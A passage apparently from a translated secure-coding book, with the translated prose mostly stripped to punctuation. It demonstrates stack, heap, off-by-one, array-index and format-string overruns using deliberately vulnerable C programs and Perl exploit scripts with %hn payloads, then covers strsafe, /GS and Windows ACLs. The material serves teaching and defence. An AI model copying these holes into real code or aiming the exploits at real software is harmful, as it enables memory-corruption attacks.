10 .
. ,
,
,
,
malloc.
, .
,
(Release) .
Microsoft Visual C++
,
. , Visual C++
Release. ,
:
C:\Secureco2\Chapter05>StackOverrun.exe Hello
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A < , foo.
00410EDE
Hello
:
6C6C6548 < , "Hello".
0000006F
7FFDF000
0012FF80
0040108A
00410EDE
:
C:\Secureco2\Chapter05>StackOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
AAAAAAAAAAAAAAAAAAAAAAAA
:
41414141
41414141
41414141
41414141
41414141
41414141
(. 51), , ,
0x41414141,
0x41414141.
. 51.
: ,
Dr. Watson. ASCII
, 0x41 A. ,
. ! , ,
, ,
. .
,
. ,
, .
:
. ,
. ,
,
, .
,
,
. , ,
. ,
,
exploit.
,
, ,
. !
, !
:
,
. ,
.
, ,
. ,
.
. .
, , 100
.
,
, , ,
. , ,
. ,
, , ,
. , .
,
. .
, ,
.
! .
!
, .
:
C:\Secureco2\Chapter05>StackOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410EBE
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
:
44434241
48474645
4C4B4A49
504F4E4D
54535251
58575655
,
0x54535251. ASCII, 0x54 T.
:
C:\Secureco2\Chapter05>StacOverrun.exe ABCDEFGHIJKLMNOPQRS
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
ABCDEFGHIJKLMNOPQRS
:
44434241
48474645
4C4B4A49
504F4E4D
00535251
00410ECE
, ! ,
, .
,
$arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40";
$cmd = "StackOverrun ".$arg;
system($cmd);
, :
C:\Secureco2\Chapter05>perl HackOverrun.pl
foo = 00401000
bar = 00401045
:
77FB80DB
77F94E68
7FFDF000
0012FF80
0040108A
00410ECA
ABCDEFGHIJKLMNOPE?@
:
44434241
48474645
4C4B4A49
504F4E4D
00401045
00410ECA
! !
, ? .
16
. ,
, , .
:
( U.S. English) .
,
. ,
. ,
Perl bar.
, Visual C++ .NET
/GC, . (
/GC !) /GC
.
,
(off-by-one error). ,
.
/*
OffByOne.c
Demonstrates an off-by-one error: strncpy fills the whole buffer, and the
terminator is then written one byte past its end.
*/
#include <stdio.h>
#include <string.h>

void foo(const char* in)
{
    char buf[64];

    strncpy(buf, in, sizeof(buf));
    buf[sizeof(buf)] = '\0'; // BUG (intentional): writes one byte past the end of buf.

    printf("%s\n", buf);
}

void bar(const char* in)
{
    printf("Augh! I've been hacked!\n");
}

int main(int argc, char* argv[])
{
    if(argc != 2)
    {
        printf("Usage: %s [string]\n", argv[0]);
        return -1;
    }

    printf("Address of foo is %p, address of bar is %p\n", foo, bar);
    foo(argv[1]);
    return 0;
}
strncpy
sizeof . ,
, . ,
Release .
C/C++ Debug Information
Format , , ,
. Visual Stu
dio .NET, /GC /RTC,
. Linker ()
.
A ,
foo .
, Registers EBP
.
$arg = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"."\x40\x10\x40";
$cmd = "off_by_one ".$arg;
system($cmd);
:
, ,
.
,
, .
w00w00 on Heap Overflows (w00w00 ).
, (Matt Conover), w00w00 Security Development
(WSD), http://www.w00w00.org/files/articles/heaptut.txt. WSD ,
,
. ,
:
,
, ,
;
,
. , StackGuard,
(Crispin Cowan) , ,
( ,
),
. Visual C++ .NET
.
;
.
,
.
UNIX, ,
Windows . Windows
,
. , w00w00,
BugTraq (http://www.securityfocus.com/archive/1/71598)
Solar Designer:
: BugTraq
: Netscape,
JPEG COM
: 25 2000 , 04:56:42
: Solar Designer <solar@false.com>
: <200007242356.DAA01274@false.com>
[ ]
malloc (Doug Lea) (
Linux, libc5, glibc),
(locale) 8
( ,
glibc, en_US ru_RU.KOI8R).
: ( ),
. 0 ,
(LSB
).
, ,
free(3)
.
[ ]
, Linux/
x86. .
, Win32
( ntdll!RtlFreeHeap).
http://www.blackhat.com/presentations/winusa02/halvarflake
winsec02.ppt (Halvar Flake)
.
:
/*
HeapOverrun.cpp
Demonstrates a heap overrun: two 16-byte heap blocks are allocated back
to back, and an unchecked strcpy into the first overwrites the object
that holds a pointer to the second.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
Very flawed class to hold a string buffer: it never learns the size of
the buffer it is given, so SetString has no way to check its input.
*/
class BadStringBuf
{
public:
    BadStringBuf(void)
    {
        m_buf = NULL;
    }

    ~BadStringBuf(void)
    {
        if(m_buf != NULL)
            free(m_buf);
    }

    void Init(char* buf)
    {
        // Really bad code: takes ownership of a buffer of unknown size.
        m_buf = buf;
    }

    void SetString(const char* input)
    {
        // This is stupid too: no length check at all.
        strcpy(m_buf, input);
    }

    const char* GetString(void)
    {
        return m_buf;
    }

private:
    char* m_buf;
};

// Declare a pointer to the BadStringBuf class to hold our input.
BadStringBuf* g_pInput = NULL;

void bar(void)
{
    printf("Augh! I've been hacked!\n");
}

void BadFunc(const char* input1, const char* input2)
{
    // Someone told me that heap overruns were not exploitable,
    // so we are just going to allocate everything on the heap.
    char* buf = NULL;
    char* buf2;

    buf2 = (char*)malloc(16);
    g_pInput = new BadStringBuf;
    buf = (char*)malloc(16);

    // Bad class, no size checks: the object sits right after buf2.
    g_pInput->Init(buf2);

    // The next two lines copy the inputs with no length check, so input1
    // overruns buf and input2 overruns buf2.
    strcpy(buf, input1);
    g_pInput->SetString(input2);

    printf("Input 1 = %s\nInput 2 = %s\n",
           buf, g_pInput->GetString());

    if(buf != NULL)
        free(buf);
}

int main(int argc, char* argv[])
{
    // Simulated argv strings.
    char arg1[128];

    // This is the address of the bar function.
    // It looks backwards because Intel processors are little endian.
    char arg2[4] = {0x0f, 0x10, 0x40, 0};

    int offset = 0x40;

    // Using 0xfd is an evil trick to overcome heap corruption checking:
    // 0xfd is the value the debug heap writes past the end of a block.
    // No error checking here; this is just an example of how an
    // overflow string is constructed.
    memset(arg1, 0xfd, offset);
    arg1[offset]   = (char)0x94;
    arg1[offset+1] = (char)0xfe;
    arg1[offset+2] = (char)0x12;
    arg1[offset+3] = 0;
    arg1[offset+4] = 0;

    printf("Address of bar is %p\n", bar);

    BadFunc(arg1, arg2);

    if(g_pInput != NULL)
        delete g_pInput;

    return 0;
}
Secureco2\Chapter05. ,
main. ,
, .
. ,
, , BadFunc
.
, BadFunc ,
, ,
, . C++,
BadStringBuf, .
. ,
malloc, free .
, .
. ,
, ,
( ) ,
.
.
? ,
,
? ,
, , ,
0x40 .
,
!
, bar,
, 0x0012fe94,
,
BadFun. ,
, Visual C++ 6.0,
Release
. ,
0x0012fe94 bar.
: , .
, :
bar 0040100F
1 = ????????????????????????????????????????????????????????o57
2 = 64@
! !
,
Visual C++ !
,
, . Solar Designer
, ,
,
.
. ,
, (, )
, . :
,
.
,
, , , , .
,
. .
, ,
. ,
? ,
,
, . .
, ,
:
/*
ArrayIndexError.cpp
Demonstrates that an unchecked array index is a buffer overrun too:
an index beyond the end of the array writes a caller-chosen value to
an arbitrary address.
*/
#include <stdio.h>
#include <stdlib.h>

int* IntVector;

void bar(void)
{
    printf("Augh! I've been hacked!\n");
}

void InsertInt(unsigned long index, unsigned long value)
{
    // We are so sure that no one would ever pass in a value
    // larger than 64 KB that we do not even declare the function
    // as taking unsigned shorts, let alone check the index. (That is the bug.)
    printf("Writing memory at %p\n", &(IntVector[index]));
    IntVector[index] = value;
}

bool InitVector(int size)
{
    IntVector = (int*)malloc(sizeof(int)*size);
    printf("Address of IntVector is %p\n", IntVector);

    if(IntVector == NULL)
        return false;
    else
        return true;
}

int main(int argc, char* argv[])
{
    unsigned long index, value;

    if(argc != 3)
    {
        printf("Usage is %s [index] [value]\n", argv[0]);
        return -1;
    }

    printf("Address of bar is %p\n", bar);

    // Let's initialize our vector: 64 KB ought to be enough for anyone <g>.
    if(!InitVector(0xffff))
    {
        printf("Cannot initialize vector!\n");
        return -1;
    }

    index = atol(argv[1]);
    value = atol(argv[2]);

    InsertInt(index, value);
    return 0;
}
ArrayIndexError.cpp Secureco2\Chapter05.
, ,
,
, .
.
0x00510048, ,
( ), ,
0x0012FF84. ,
, ,
:
= + * sizeof()
, :
,
, .
, ,
. BugTraq:
(http://www.securityfocus.com/archive/1/81565) (Tim Newsham),
(http://www.securityfocus.com/archive/1/66842) (Lamagra
/*
FormatString.cpp
Demonstrates a format-string bug: text supplied by the user reaches
fprintf as the format argument, which lets the caller read the stack
and, through %n, write to memory.
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

typedef void (*ErrFunc)(unsigned long);

void GhastlyError(unsigned long err)
{
    printf("Unrecoverable Error! - err = %lu\n", err);
    // In real life this would be a pointer to a function that shuts the
    // application down, for example by tearing down the X Window session.
    // Here we simply exit instead of returning to main.
    exit(-1);
}

void RecoverableError(unsigned long err)
{
    printf("Something went wrong, but you can fix it - err = %lu\n",
           err);
}

void PrintMessage(char* file, unsigned long err)
{
    ErrFunc fErrFunc;
    char buf[512];

    if(err == 5)
    {
        // Access denied: use the fatal handler.
        fErrFunc = GhastlyError;
    }
    else
    {
        fErrFunc = RecoverableError;
    }

    _snprintf(buf, sizeof(buf)-1, "Cannot find %s", file);

    // _snprintf does not terminate the buffer when the output is truncated,
    // so terminate it ourselves before using it.
    buf[sizeof(buf)-1] = '\0';

    // Correct: buf is passed as an argument, not as the format.
    printf("%s", buf);

    // Cheating to make the example easier: show where fErrFunc lives.
    printf("\nAddress of fErrFunc = %p\n", &fErrFunc);

    // Here is the bug (intentional): buf, which contains user input,
    // is passed as the format string itself.
    fprintf(stdout, buf);

    printf("\nCalling ErrFunc: %p\n", fErrFunc);
    fErrFunc(err);
}

void foo(void)
{
    printf("Augh! I've been hacked!\n");
}

int main(int argc, char* argv[])
{
    FILE* pFile;

    if(argc != 2)
    {
        printf("Usage: %s [file]\n", argv[0]);
        return -1;
    }

    // Even more cheating: print where foo lives.
    printf("Address of foo = %p\n", foo);

    // Try to open the file named on the command line.
    pFile = fopen(argv[1], "r");

    if(pFile == NULL)
    {
        PrintMessage(argv[1], errno);
    }
    else
    {
        printf("Opened %s\n", argv[1]);
        fclose(pFile);
    }

    return 0;
}
. ,
, PrintMessage, ,
(
), . PrintMessage
.
printf, exploit
, . , ,
foo.
:
C:\Secureco2\Chapter05>formatstring.exe not_exist
foo ! 00401100
not_exist
fErrFunc ! 0012FF1C
not_exist
ErrFunc: 00401030
! , , , err = 2
:
C:\Secureco2\Chapter05>formatstring.exe %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%
x%x%x%x%x%x%x%x
foo ! 00401100
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
fErrFunc ! 0012FF1C
14534807ffdf000000000000000012fde8077f516b36e6e6143662
0746f20646e69782578257825782578257825782578257825782578257825
ErrFunc: 00401030
! , , , ! err = 2
! , .
7825 %x ,
(little endian).
.
. Perl
, $arg.
$arg:
# The $arg assignments below are the successive inputs from the chapter's
# walk-through; uncomment one at a time.
$arg = "%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%p"."ABC";
# $arg = "......%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%p"."ABC";
# $arg = ".....%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn"."\x1c\xff\x12";
# $arg = "%.4066x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn"."\x1c\xff\x12";

$cmd = "formatstring ".$arg;
system($cmd);
ABC %x
%p. ,
%x :
C:\Secureco2\Chapter05>perl test1.pl
foo ! 00401100
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%pABC
fErrFunc ! 0012FF1C
70005c6f00727[]782578257025782500434241ABC
%x, 00434241ABC.
, %p, ABC.
.
exploit, Perl,
ABC \x1c\xff\x12, ,
fErrFunc! , ErrFunc
.
(.)
%x. , 00434241ABC,
,
4 , %x ,
%p , . exploit
:
C:\Secureco2\Chapter05>perl test.pl
foo ! 00401100
......%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%pABC
fErrFunc ! 0012FF1C
......70005c6f00727[...]8257025782500434241ABC
45
, . ,
, %hn 16 ,
%p. (
h), ABC \x1c\xff\x12 .
, , :
C:\Secureco2\Chapter05>perl test.pl
foo ! 00401100
.....%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn? ?
fErrFunc ! 0012FF1C
.....70005c6f00727[]78257825786e682578? ?
ErrFunc: 00400129
, . :
ErrFunc! ,
foo 0x00401100, ErrFunc 0x00400129,
foo 4055 , . , ,
.4066 %x, !
test.pl :
ErrFunc 00401100
! !
,
. 2 , .
,
,
. .
,
, . , ,
.
Unicode ANSI
,
, ANSI Unicode,
Windows. ,
. . Windows NT ( )
ANSI, Unicode, Unicode
,
(wide), , .
MultiByteToWideChar,
(). :
// Assumed declarations (not on the page): an ANSI source string and a
// fixed-size wide destination buffer.
char  szName[32] = "sample name";   // constructed sample input
WCHAR wszUserName[32];

MultiByteToWideChar(CP_ACP, 0,
                    szName,
                    -1,                       // szName is null-terminated
                    wszUserName,
                    sizeof(wszUserName) /
                    sizeof(wszUserName[0]));  // size in characters, not bytes
, :
, Unicode
, IPP (Internet Printing
Protocol), Unicode. MS01-23 (http://www.microsoft.com/technet/security). IPP ISAPI
IIS 5 (Internet Information Services), ;
,
. IIS. :
#include <windows.h>
#include <httpext.h>

TCHAR wszComputerName[256];

BOOL GetServerName(EXTENSION_CONTROL_BLOCK *pECB) {
    // BUG (intentional): dwSize is the size in bytes of the TCHAR array
    // (512 when compiled for Unicode), but it is passed as the size of
    // the 256-byte char buffer below.
    DWORD dwSize = sizeof(wszComputerName);
    char szComputerName[256];
    if (pECB->GetServerVariable(pECB->ConnID,
                                "SERVER_NAME",
                                szComputerName,
                                &dwSize)) {
        // Do something useful here.
        return TRUE;
    }
    return FALSE;
}
ISAPI GetServerVariable dwSize
szComputerName. dwSize 512, TCHAR ,
Unicode.
, 512 szComputerName,
256 . !
, , ANSI
Unicode, . null,
? (Chris Anley) (http://www.nextgenss.com/papers/
unicodebo.pdf) , . , ,
, , , Intel
.
Unicode
. , ,
, .
!
,
.
(Steve Maguire) Writing
Solid Code ( ) (Microsoft Press, 1993).
.
, ,
. ,
,
, .
, :
#ifdef _DEBUG
    // buflen = size of dest: fill the buffer with a recognisable pattern
    // in debug builds so that overruns show up during testing.
    memset(dest, 'A', buflen);
#endif
, .
, . ,
,
, .
,
Strsafe.h; .
,
. , ,
.
, lstrcpy, lstrcat lstrcpyn, Windows,
Windows , StrCpy, StrCat
StrCpyN ( Shlwapi.dll). lstr
,
( , LPTSTR),
, ANSI.
, , strsafe.
strcpy
, ,
. :
, ,
. null,
.
null, ,
, null.
, .
,
.
strcpy:
#include <assert.h>
#include <string.h>

/* This function shows how to avoid the problem: check the length before strcpy. */
bool HandleInput(const char* input)
{
    char buf[80];
    if(input == NULL)
    {
        assert(false);
        return false;
    }

    // strlen walks input until it finds a null terminator, so this call
    // itself can read out of bounds if input is not null-terminated.
    // (The length check that the page's own listing lost at a page break
    // is reconstructed here.)
    if(strlen(input) < sizeof(buf))
    {
        // The input fits, terminator included.
        strcpy(buf, input);
    }
    else
    {
        return false;
    }

    // Do more processing of buffer.
    return true;
}
strlen , null.
: strlen, sizeof size_t,
.
, , size_t
, 20
.
, ,
null, , , .
, strcpy
. , ,
, .
strcpy. , ,
, , , .
, strcpy ,
.
:
#define STRSAFE_NO_DEPRECATE
,
, . (
2001 ., .)
,
. strcpy, , .
strncpy
, . :
/* This function shows how to use strncpy.
   The buffer is always terminated after the copy. */
bool HandleInput_Strncpy1(const char* input)
{
    char buf[80];
    if(input == NULL)
    {
        assert(false);
        return false;
    }

    // Copy at most sizeof(buf) - 1 characters, then terminate explicitly,
    // because strncpy adds no null when the input is too long. (These two
    // lines are missing from the page and are reconstructed here.)
    strncpy(buf, input, sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';

    // Do more processing of buffer.
    return true;
}
/* Another way to use strncpy safely: the terminator is set in advance
   and checked afterwards, so a too-long input is detected, not truncated silently. */
bool HandleInput_Strncpy2(const char* input)
{
    char buf[80];
    if(input == NULL)
    {
        assert(false);
        return false;
    }

    buf[sizeof(buf) - 1] = '\0';

    // Some compilers complain about this construct; wrap it in a pragma if
    // you must. The pattern itself is safe: both the copy count and the
    // check below use sizeof(buf).
    strncpy(buf, input, sizeof(buf));

    if(buf[sizeof(buf) - 1] != '\0')
    {
        // Overflow: the input was at least sizeof(buf) characters long.
        return false;
    }

    // Do more processing of buffer.
    return true;
}
HandleInput_Strncpy2 .
null , strncpy
, sizeof(buf) 1 . ,
, null
, ;
.
sprintf
sprintf strcpy .
. :
/* Example of bad sprintf usage (intentionally vulnerable). */
bool SprintfLogError(int line, unsigned long err, char* msg)
{
    char buf[132];
    if(msg == NULL)
    {
        assert(false);
        return false;
    }

    // How many ways can sprintf go wrong??? No bound is given for buf,
    // so a long msg overruns it.
    sprintf(buf, "Error in line %d = %lu - %s\n", line, err, msg);

    // Do more stuff here, such as logging the error
    // to a file and displaying it to the user.
    return true;
}
, ? msg
null, SprintfLogError, , .
21 . err
10 , line 11 . (
, .) ,
msg 89 .
,
. sprintf . ,
, :
_snprintf
. :
int _snprintf( char *buffer, size_t count, const char *format [, argument] ... );
sprintf, .
:
/* Example of _snprintf usage. */
bool SnprintfLogError(int line, unsigned long err, char* msg)
{
    char buf[132];
    if(msg == NULL)
    {
        assert(false);
        return false;
    }

    // Look out for the null terminator! The count is one less than the
    // buffer size so that we can always terminate the buffer ourselves.
    if(_snprintf(buf, sizeof(buf)-1,
                 "Error in line %d = %lu - %s\n", line, err, msg) < 0)
    {
        // Overflow: the output was truncated.
        return false;
    }
    else
    {
        buf[sizeof(buf)-1] = '\0';
    }

    // Do more stuff here, such as logging the error
    // to a file and displaying it to the user.
    return true;
}
, , ,
: _snprintf ,
null ,
Microsoft C, .
, C,
ISO C99. _snprintf (, ,
), ,
. :
, , ,
, null.
,
, , ;
.
, ,
, null.
null.
. strcpy, strcat ( ),
strncat , ,
, . _snprintf
.
_snprintf strncpy
strncat. ,
.
/* Example using the C++ Standard Template Library */
#include <cstdio>
#include <string>
using namespace std;

void HandleInput_STL(const char* input)
{
    string str1, str2;

    // Use this form if you are sure that input is null-terminated.
    str1 = input;

    // If you are not sure whether input is null-terminated, use append with
    // an explicit count. Note that append copies exactly 132 characters, so
    // the source buffer must be at least 132 bytes long.
    str2.append(input, 132);

    // Do more processing here.
    // Print the string out to the console.
    printf("%s\n", str2.c_str());
}
! :
gets fgets
gets. :
Strsafe.h
Windows (Windows Security Push)
2002 . ,
,
. , (
SDK):
,
;
null,
;
HRESULT
S_OK;
:
(cch) (cb);
(Ex) ,
.
Strsafe.h Secureco2\Strsafe.
, . ,
. , sizeof msize.
, strncat, ,
. null
, , , ,
. , .
null.
. ,
, strncpy? ,
; ,
.
,
ANSI Unicode , ,
, .
, strsafe :
, . ,
, ;
STRSAFE_NO_CB_FUNCTIONS STRSAFE_NO_CCH_FUNCTIONS.
, ,
, . :
STRSAFE_FILL_BEHIND_NULL ,
. , ,
, ;
STRSAFE_IGNORE_NULLS null .
lstrcpy;
STRSAFE_FILL_ON_FAILURE
;
STRSAFE_NULL_ON_FAILURE
;
STRSAFE_NO_TRUNCATION .
, .
.
, ,
.
, ( ),
, .
Strsafe.h : STRSAFE_NO_
DEPRECATE, !
:
, ,
.
, .
, , ,
, .
Web http://msdn.microsoft.com/library/enus/winui/winui/windowsuserinterface/resources/strings/usingstrsafefunctions.asp.
C strsafe:
#include <windows.h>
#include <strsafe.h>

// Non-strsafe version: the C run-time functions do not track the
// remaining space in szPath, so each strncat can overrun it.
void UnsafeFunc(LPTSTR szPath, DWORD cchPath) {
    TCHAR szCWD[MAX_PATH];
    GetCurrentDirectory(ARRAYSIZE(szCWD), szCWD);
    strncpy(szPath, szCWD, cchPath);
    strncat(szPath, TEXT("\\"), cchPath);
    strncat(szPath, TEXT("desktop.ini"), cchPath);
}

// strsafe version: every call receives the total size of szPath in
// characters and reports failure instead of overrunning the buffer.
bool SaferFunc(LPTSTR szPath, DWORD cchPath) {
    TCHAR szCWD[MAX_PATH];
    if (GetCurrentDirectory(ARRAYSIZE(szCWD), szCWD) &&
        SUCCEEDED(StringCchCopy(szPath, cchPath, szCWD)) &&
        SUCCEEDED(StringCchCat(szPath, cchPath, TEXT("\\"))) &&
        SUCCEEDED(StringCchCat(szPath, cchPath, TEXT("desktop.ini")))) {
        return true;
    }
    return false;
}
,
strsafe, .
strsafe. ?
char buff1[N1];
char buff2[N2];
HRESULT h1 = StringCchCat(buff1, ARRAYSIZE(buff1), szData);
HRESULT h2 = StringCchCat(buff2, ARRAYSIZE(buff1), szData);
StringCchCat.
: buff2 , buff1. :
char buff1[N1];
char buff2[N2];
HRESULT h1 = StringCchCat(buff1, ARRAYSIZE(buff1), szData);
HRESULT h2 = StringCchCat(buff2, ARRAYSIZE(buff2), szData);
C.
, strcpy strcat
strncpy strncat , ,
. ?
/GS , StackGuard,
(Crispin Cowan) http://
www.immunix.org. ,
gcc. /GS StackGuard
, .
. ,
Visual C++ .NET, /GS
? . ,
/GS, StackGuard .
. ( ,
Microsoft Office.)
(stack smashing)
.
/GS.
(pointer subterfuge)
. /GS
, .
(register attack) ,
( EBP), .
.
VTable (VTable hijacking)
, VTable . , /GS
. /GS
, ,
,
. , VTable
.
(exception handler clobbe
ring) ,
. /GS ,
.
(index out of range)
,
. /GS ,
.
(heap overflow)
. /GS .
/GS , ?
, EIP EBP.
, ,
, . ,
, /GS
( ).
,
.
, ,
. ,
.
. , ,
, (
http://immunix.org/stackguard.html), ,
.
(Greg Hoglund)
NTBUGTRAQ, , /GS. ,
, .
,
, ,
.
,
, , , , .
, ,
. .
,
.
( ), .
,
?
. ,
.
:
/GS ( ) ,
.
(
).
! /GS , .
, .
. ,
. , ,
, ,
.
,
. :
,
Strsafe.h, . ,
, .
, ,
, , .
Microsoft Windows
.
(Access Control List, ACL).
ACL Windows NT/2000/XP Windows .NET Server
2003.
, ACL
,
.
, .
, ,
, , ACL,
, , ACL,
(Discretionary Access Control List, DACL)
(Access Control Entry, ACE)
.
ACL
,
ACL ,
.
, .
! ACL
. .
,
, ACL Full Control (
) Everyone (). ,
, , ,
,
. , ,
ACL:
? (
). ACL .
Full Control Everyone, ,
,
64 , . ,
Everyone Deny: Full Control (:
), .
ACL Full Control Administrators Read
() Everyone, ,
( WRITE_DAC).
.
, ,
.
, !
, , ACL,
? ! ,
3. ,
.
:
ACL,
, ,
, .
:
// Bad (but common) code: the buffer size is taken from the registry value itself.
DWORD cbBuff = 0;
if (RegQueryValueEx(hKey,
                    MY_VALUE,
                    NULL,
                    NULL,
                    NULL,
                    &cbBuff) == ERROR_SUCCESS) {
    BYTE *pbBuff = new BYTE[cbBuff];

    // Allocates whatever size cbBuff reports: anyone who can write the
    // value controls the size of this allocation.
    if (pbBuff && RegQueryValueEx(hKey,
                                  MY_VALUE,
                                  NULL,
                                  NULL,
                                  pbBuff,
                                  &cbBuff) == ERROR_SUCCESS) {
        // Cool! We can use the data in pbBuff.
        // Do something useful with it.
    }

    delete [] pbBuff;
}
, .
, ,
. ,
ACL 10 ,
10 ?
? ,
10 .
, ,
.
:
// Better: the caller fixes the maximum size up front.
// MAX_BUFF and MY_VALUE are defined elsewhere in the program.
BYTE bBuff[MAX_BUFF];
ZeroMemory(bBuff, MAX_BUFF);
HKEY hKey = NULL;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                 "Software\\Northwindtraders",
                 0,
                 KEY_READ,
                 &hKey) == ERROR_SUCCESS) {
    DWORD cbBuff = sizeof (bBuff);

    // Reads at most MAX_BUFF bytes; a larger value fails with ERROR_MORE_DATA.
    if (RegQueryValueEx(hKey,
                        MY_VALUE,
                        NULL,
                        NULL,
                        bBuff,
                        &cbBuff) == ERROR_SUCCESS) {
        // Cool! We can use the data in bBuff.
    }
}
if (hKey)
    RegCloseKey(hKey);
,
, , , MAX_BUFF.
, RegQueryValueEx ERROR_MO
RE_DATA, , .
: ,
ACL.
ACL
. ACL.
ACL
ACL, , ,
. , , .. ACL
, ,
, ACL
szVol,
:
#include <stdio.h>
#include <windows.h>

int main() {
    const char *szVol = "c:\\";
    DWORD dwFlags = 0;
    // Query the file system flags of the volume; FS_PERSISTENT_ACLS
    // is set when the file system stores ACLs.
    if (GetVolumeInformation(szVol,
                             NULL,
                             0,
                             NULL,
                             NULL,
                             &dwFlags,
                             NULL,
                             0)) {
        printf("Volume %s %s ACLs.",
               szVol,
               (dwFlags & FS_PERSISTENT_ACLS) ? "supports" : "does not support");
    } else {
        printf("Error %lu", GetLastError());
    }
    return 0;
}
: , \\Blakes
Laptop\BabyPictures. GetVolumeInformation
Platform SDK MSDN.
VBScript (Microsoft Visual Basic
Scripting Edition) Microsoft JScript. VBScript
, NTFS,
ACL, FileSystemObject.
, NTFS ,
ACL. , Windows
ACL NTFS.
, ACL.
Windows . , ,
.
, ;
Administrators ().
ACL
,
, : ACE ACL,
. , , ACE
ACL, .
.
ACL.
ACL;
.
, ACL , :
1. , ;
2. ,
;
3. ;
4.
.
, , ,
, , Web, . .,
. , ACL
. ,
, , .
.
, Everyone:
Full Control .
:
.
: .
.
.
. ,
(use case) UML
(Unified Modeling Language), , ,
.
, ,
.
UML
(Martin Fowler) (Kendall Scott) UML Distilled: A
Brief Guide to the Standard Object Modeling Language ( UML:
)
(2nd Edition, Addison-Wesley Publishing Co, 1999).
, ACL ACE,
, :
. ACE.
, ,
ACE: Interactive: Read (: ).
. 32
, ,
ACE.
Interactive ,
,
( ,
). ,
SID , LogonUser
dwLogonType, LOGON32_LOGON_INTERACTIVE.
,
. ,
FTP HTTP
IIS 5.
(
, ), ACL.
ACL, . 61.
Table 6-1. (ACL)
Trustee                      Access
Accounting (Interactive)     Read
Administrators               Full Control
SYSTEM                       Full Control
! ACL ACE
. ACL,
Windows, ACE
.
ACE ,
, .
Everyone: Full Control ACL
.
, , ,
.
, ,
ACL
!
ACL ,
(Terminal Server).
, ,
ACL
.
ACL
2001 . Microsoft
Weak Permissions on Winsock Mutex Can Allow Service
Failure ( Winsock
) (MS01-003) (www.microsoft.com/technet/security).
ACE-
,
.
ACE.
.
.
ACL
, ,
ACL , ,
. ACL Windows NT 4 Windows 2000,
Visual Studio .NET
ATL (Active Template Library).
ACL Windows NT 4
, ACL
C++, . ,
ACL ,
. Windows NT 4
. ( Windows NT
malloc AddAce!) , ACL
(security descriptor), .
: ACL,
. ACL
. , ACL,
, ACL
.
/*
    NT4ACL.cpp
*/
#include <windows.h>
#include <stdio.h>
#include <aclapi.h>

int main() {
    PSID pEveryoneSID = NULL, pAdminSID = NULL, pNetworkSID = NULL;
    PACL pACL = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;

    // Build an ACL with three ACEs:
    //   Network (Deny Access)
    //   Everyone (Read)
    //   Administrator (Full Control)
    try {
        const int NUM_ACES = 3;
        EXPLICIT_ACCESS ea[NUM_ACES];
        ZeroMemory(ea, NUM_ACES * sizeof(EXPLICIT_ACCESS));

        // Create a SID for the Network group.
        SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
        if (!AllocateAndInitializeSid(&SIDAuthNT, 1,
                                      SECURITY_NETWORK_RID,
                                      0, 0, 0, 0, 0, 0, 0,
                                      &pNetworkSID))
            throw GetLastError();
        ea[0].grfAccessPermissions = GENERIC_ALL;
        ea[0].grfAccessMode = DENY_ACCESS;
        ea[0].grfInheritance = NO_INHERITANCE;
        ea[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
        ea[0].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
        ea[0].Trustee.ptstrName = (LPTSTR) pNetworkSID;

        // Create a SID for the Everyone group.
        SID_IDENTIFIER_AUTHORITY SIDAuthWorld =
            SECURITY_WORLD_SID_AUTHORITY;
        if (!AllocateAndInitializeSid(&SIDAuthWorld, 1,
                                      SECURITY_WORLD_RID,
                                      0, 0, 0, 0, 0, 0, 0,
                                      &pEveryoneSID))
            throw GetLastError();
        ea[1].grfAccessPermissions = GENERIC_READ;
        ea[1].grfAccessMode = SET_ACCESS;
        ea[1].grfInheritance = NO_INHERITANCE;
        ea[1].Trustee.TrusteeForm = TRUSTEE_IS_SID;
        ea[1].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
        ea[1].Trustee.ptstrName = (LPTSTR) pEveryoneSID;

        // Create a SID for the
        // BUILTIN\Administrators group.
